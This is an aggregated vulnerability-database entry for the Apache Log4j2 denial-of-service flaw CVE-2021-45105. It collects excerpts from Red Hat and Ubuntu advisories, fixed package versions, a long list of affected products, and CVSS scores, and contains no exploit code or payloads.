iQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK HU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K khbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ rZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo P1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e sPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R IwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt l3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0 U8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp zhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca dcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe UnHI/WwB37w= =eCh2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. ========================================================================= Ubuntu Security Notice USN-5222-1 January 11, 2022
apache-log4j2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. (CVE-2021-45105)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10: liblog4j2-java 2.17.1-0.21.10.1
Ubuntu 21.04: liblog4j2-java 2.17.1-0.21.04.1
Ubuntu 20.04 LTS: liblog4j2-java 2.17.1-0.20.04.1
Ubuntu 18.04 LTS: liblog4j2-java 2.12.4-0ubuntu0.1
In general, a standard system update will make all the necessary changes. Solution:
For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html
4
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202112-1782", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3", }, { model: "e-business suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: 
"insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.2.0", }, { model: "flexcube universal banking", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "18.8.0", }, { model: "network security manager", scope: "gte", trust: 1, vendor: "sonicwall", version: "2.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "banking enterprise default management", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications cloud native core network repository function", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.1", }, { model: "web application firewall", scope: "lt", trust: 1, vendor: "sonicwall", version: "3.1.0", }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.12.3", }, { model: "communications interactive session recorder", scope: "eq", trust: 1, vendor: "oracle", version: "6.4", }, { model: "email security", scope: "lte", trust: 1, vendor: "sonicwall", version: "10.0.12", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.8", }, { model: "communications diameter signaling router", scope: "lte", trust: 1, vendor: "oracle", version: "8.5.1.0", }, { model: "hyperion infrastructure technology", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.7", }, { model: "agile engineering data management", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.1.0", }, { model: "flexcube universal banking", scope: "lte", trust: 1, vendor: "oracle", version: "12.4", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: 
"9.2.0.0", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "19.12", }, { model: "retail order management system", scope: "eq", trust: 1, vendor: "oracle", version: "19.5", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.6.1.0", }, { model: "communications service broker", scope: "eq", trust: 1, vendor: "oracle", version: "6.2", }, { model: "banking treasury management", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "sql developer", scope: "lt", trust: 1, vendor: "oracle", version: "21.4.2", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "18.8", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.6.0", }, { model: "management cloud engine", scope: "eq", trust: 1, vendor: "oracle", version: "1.5.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "18.8.13", }, { model: "retail data extractor for merchandising", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.2", }, { model: "retail data extractor for merchandising", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.2", }, { model: "communications cloud native core console", scope: "eq", trust: 1, vendor: "oracle", version: "1.9.0", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.13.0", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 1, vendor: "oracle", version: "21.12.0.0", }, { model: "healthcare foundation", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.0.4", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3", }, { model: "banking platform", 
scope: "eq", trust: 1, vendor: "oracle", version: "2.6.2", }, { model: "communications user data repository", scope: "eq", trust: 1, vendor: "oracle", version: "12.4", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.5", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.1.0.0", }, { model: "flexcube universal banking", scope: "gte", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "insurance insbridge rating and underwriting", scope: "gte", trust: 1, vendor: "oracle", version: "5.4", }, { model: "communications services gatekeeper", scope: "eq", trust: 1, vendor: "oracle", version: "7.0", }, { model: "6bk1602-0aa32-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0.6", }, { model: "payment interface", scope: "eq", trust: 1, vendor: "oracle", version: "20.3", }, { model: "retail integration bus", scope: "gte", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "communications element manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "agile plm mcad connector", scope: "eq", trust: 1, vendor: "oracle", version: "3.6", }, { model: "retail invoice matching", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "7.0.0.0", }, { model: "primavera gateway", scope: "eq", trust: 1, vendor: "oracle", version: "21.12.0", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.1.1", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.46", }, { model: "communications cloud native core unified data repository", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: 
"log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.3.1", }, { model: "insurance data gateway", scope: "eq", trust: 1, vendor: "oracle", version: "1.0.1", }, { model: "communications ip service activator", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "20.12.7", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "20.0.1", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "retail merchandising system", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.14", }, { model: "communications diameter signaling router", scope: "gte", trust: 1, vendor: "oracle", version: "8.3.0.0", }, { model: "communications evolved communications application server", scope: "eq", trust: 1, vendor: "oracle", version: "7.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "13.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.0", }, { model: "communications cloud native core service communication proxy", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "communications cloud native core security edge protection proxy", scope: "eq", trust: 1, vendor: "oracle", version: "1.7.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.5", }, { model: "communications pricing design center", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.4", }, { model: "siebel ui framework", scope: "lte", trust: 1, vendor: "oracle", 
version: "21.12", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.0", }, { model: "flexcube universal banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.83.3", }, { model: "payment interface", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "retail merchandising system", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "communications convergent charging controller", scope: "gte", trust: 1, vendor: "oracle", version: "12.0.1.0.0", }, { model: "linux", scope: "eq", trust: 1, vendor: "debian", version: "10.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail point-of-service", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "health sciences information manager", scope: "gte", trust: 1, vendor: "oracle", version: "3.0.1", }, { model: "log4j", scope: "lte", trust: 1, vendor: "apache", version: "2.16.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.18.0", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "4.1.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "20.12.0.0", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.2.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "managed file transfer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.58", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.2", }, { 
model: "communications cloud native core network function cloud native environment", scope: "eq", trust: 1, vendor: "oracle", version: "1.10.0", }, { model: "hyperion planning", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.1", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "17.0.2", }, { model: "business intelligence", scope: "eq", trust: 1, vendor: "oracle", version: "5.5.0.0.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.4", }, { model: "flexcube universal banking", scope: "lte", trust: 1, vendor: "oracle", version: "14.3.0", }, { model: "communications network charging and control", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.1.0.0", }, { model: "communications cloud native core policy", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.59", }, { model: "communications session report manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.5.1.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "20.12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: 
"20.12.12.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "retail financial integration", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "identity manager connector", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0", }, { model: "retail financial integration", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "insurance insbridge rating and underwriting", scope: "lte", trust: 1, vendor: "oracle", version: "5.6.0.0", }, { model: "identity management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "hyperion profitability and cost management", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "retail service backbone", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.0.0", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.115", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.0", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.240", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.1", }, { model: "banking deposits and lines of credit servicing", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications pricing design center", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.5", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.4", }, { model: "banking payments", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: 
"primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "17.12.0", }, { model: "retail integration bus", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.3.0", }, { model: "retail customer insights", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.2", }, { model: "communications session route manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "banking enterprise default management", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.1", }, { model: "health sciences information manager", scope: "lte", trust: 1, vendor: "oracle", version: "3.0.4", }, { model: "cloud manager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.1.1", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "retail integration bus", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.0.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "hospitality token proxy service", scope: "eq", trust: 1, vendor: "oracle", version: "19.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.0", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "21.12", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.2", }, { model: "healthcare master 
person index", scope: "eq", trust: 1, vendor: "oracle", version: "5.0.1", }, { model: "communications asap", scope: "eq", trust: 1, vendor: "oracle", version: "7.3", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "18.0.1", }, { model: "communications convergence", scope: "eq", trust: 1, vendor: "oracle", version: "3.0.3.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.6", }, { model: "linux", scope: "eq", trust: 1, vendor: "debian", version: "11.0", }, { model: "banking party management", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.0", }, { model: "communications convergent charging controller", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.1.0.0", }, { model: "communications network charging and control", scope: "lte", trust: 1, vendor: "oracle", version: "12.0.4.0.0", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.1", }, { model: "6bk1602-0aa42-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "hyperion bi\\+", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "communications cloud native core network repository function", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "retail integration bus", scope: "lte", trust: 1, vendor: "oracle", version: "19.0.1.0", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "6.3.2.1", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.4", }, { model: "communications eagle element management system", scope: "eq", trust: 1, vendor: "oracle", version: "46.6", }, { model: "retail service backbone", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0.0", }, { model: 
"communications convergent charging controller", scope: "lte", trust: 1, vendor: "oracle", version: "12.0.4.0.0", }, { model: "banking trade finance", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "healthcare foundation", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.0.1", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "web application firewall", scope: "gte", trust: 1, vendor: "sonicwall", version: "3.0.0", }, { model: "retail central office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "6bk1602-0aa12-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "communications network charging and control", scope: "gte", trust: 1, vendor: "oracle", version: "12.0.1.0.0", }, { model: "network security manager", scope: "lt", trust: 1, vendor: "sonicwall", version: "3.0", }, { model: "retail customer insights", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.2", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1.0", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "4.1.1", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.4.13", }, { model: "flexcube universal banking", scope: "gte", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.0", }, { model: "hospitality suite8", scope: "eq", trust: 1, vendor: "oracle", version: "8.13.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.11", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "communications convergence", scope: "eq", trust: 1, vendor: "oracle", version: 
"3.0.2.2.0", }, { model: "retail invoice matching", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "banking loans servicing", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "hospitality suite8", scope: "eq", trust: 1, vendor: "oracle", version: "8.14.0", }, { model: "communications cloud native core network slice selection function", scope: "eq", trust: 1, vendor: "oracle", version: "1.8.0", }, { model: "communications eagle ftp table base retrieval", scope: "eq", trust: 1, vendor: "oracle", version: "4.5", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.1", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "communications performance intelligence center", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.0.3", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.0.0", }, { model: "hyperion data relationship management", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8.0.0", }, { model: "healthcare data repository", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.1", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.29", }, { model: "identity management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.3", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "primavera 
gateway", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.12", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.5", }, { model: "6bk1602-0aa52-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications messaging server", scope: "eq", trust: 1, vendor: "oracle", version: "8.1", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.2", }, { model: "managed file transfer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0.0.0", }, { model: "communications interactive session recorder", scope: "eq", trust: 1, vendor: "oracle", version: "6.3", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "20.12", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0.0", }, { model: "taleo platform", scope: "lt", trust: 1, vendor: "oracle", version: "22.1", }, { model: "communications network integrity", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.6", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.5.0.0", }, { model: "6bk1602-0aa22-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "hyperion tax provision", scope: "lt", 
trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "log4j", scope: null, trust: 0.7, vendor: "apache", version: null, }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Guy Lederfein of Trend Micro Security Research", sources: [ { db: "ZDI", id: "ZDI-21-1541", }, ], trust: 0.7, }, cve: "CVE-2021-45105", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2021-45105", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.1, vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-408743", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", 
attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 2.2, id: "CVE-2021-45105", impactScore: 3.6, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, { attackComplexity: "LOW", attackVector: "NETWORK", author: "ZDI", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2021-45105", impactScore: 1.4, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 0.7, userInteraction: "NONE", vectorString: "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2021-45105", trust: 1, value: "MEDIUM", }, { author: "ZDI", id: "CVE-2021-45105", trust: 0.7, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-408743", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2021-45105", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. 
